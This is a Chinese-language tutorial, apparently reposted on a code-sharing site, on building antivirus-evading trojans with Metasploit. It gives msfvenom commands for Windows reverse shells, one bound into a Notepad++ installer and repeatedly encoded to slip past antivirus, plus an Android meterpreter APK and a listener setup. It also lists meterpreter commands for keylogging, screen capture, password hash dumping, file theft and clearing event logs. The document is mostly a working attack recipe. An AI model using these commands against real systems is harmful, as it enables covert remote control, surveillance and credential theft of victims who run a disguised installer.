MSF制作免殺木馬


1、制作exe免殺木馬

前言

免殺技術全稱為反殺毒技術 Anti-Virus 簡稱“免殺”,它指的是一種能使病毒木馬免於被殺毒軟件查殺的技術。由於免殺技術的涉獵面非常廣,其中包含反匯編、逆向工程、系統漏洞等技術,內容基本上都是修改病毒、木馬的內容改變特征碼,從而躲避了殺毒軟件的查殺。

MSF編碼

在 Meatsploit 框架下免殺的方式之一就是使用MSF編碼器。其功能是對攻擊載荷文件進行重新的排列編碼,改變可執行文件中的代碼形狀,避免被殺軟認出。MSF 編碼器可以將原可執行程序重新編碼,生成一個新的二進制文件,這個文件運行以后,MSF 編碼器會將原始程序解碼到內存中並執行。

1.1 查看編碼格式

在Kali終端輸入msfvemon -l encoders列出所有可用編碼格式。需要注意的是並不是所有的編碼方式都適用於Windows系統,建議使用x86/shikata_ga_nai格式

1.2 制作免殺木馬

由於裸奔木馬容易被殺毒軟件查殺,因此需要將木馬捆綁到一個正常的軟件上,這里使用notepad為例。

裸奔木馬

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe

免殺木馬

1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe

生成exe木馬文件

1.3 運行msf監聽模塊

1 msfconsole
2 use multi/handler4 set payload windows/shell_reverse_tcp
5 set LHOST 10.10.20.2
6 set LPORT 3333
7 exploit

1.4運行木馬程序

在Kali上開啟監聽,在客戶機上執行剛才生成的木馬文件,會自動連接上Kali,接下來就可以對客戶機進行遠程控制

 

 

 1 meterpreter下的命令:
 2 getwd 當前目錄
 3 dir 查看所有文件
 4 cat c:\123.txt 查看文件123.txt內容(數據是字符串傳遞,所以加一個轉義字符\)
 5 search -f cmd.exe (搜索名為cmd.exe文件所在目錄)
 6 upload /root/桌面/backldoor.exe(要上傳的文件) -> c:\(上傳到的目錄) 上傳文件
 7 download c:\123txt /root 下載文件
 8 clearev 清除日志
 9 getuid 當前用戶
10 ps 查看所用進程
11 kill 殺死某個進程
12 sysinfo 系統信息
13 
14 鍵盤記錄
15 keyscan_start 開始鍵盤記錄
16 keyscan_dump 查看結果
17 keyscan_stop
18 
19 屏幕截圖
20 screenshot
21 
22 屏幕監控
23 run vnc
24 
25 獲取密文密碼
26 hashdump
27 
28 shell
29 獲取shell,進入cmd

 

2、MSF制作安卓木馬

2.1 制作apk木馬程序

1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk

2.2其他步驟可以參考上述的步驟

2.3 命令

sysinfo

更多命令請使用help命令查看

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM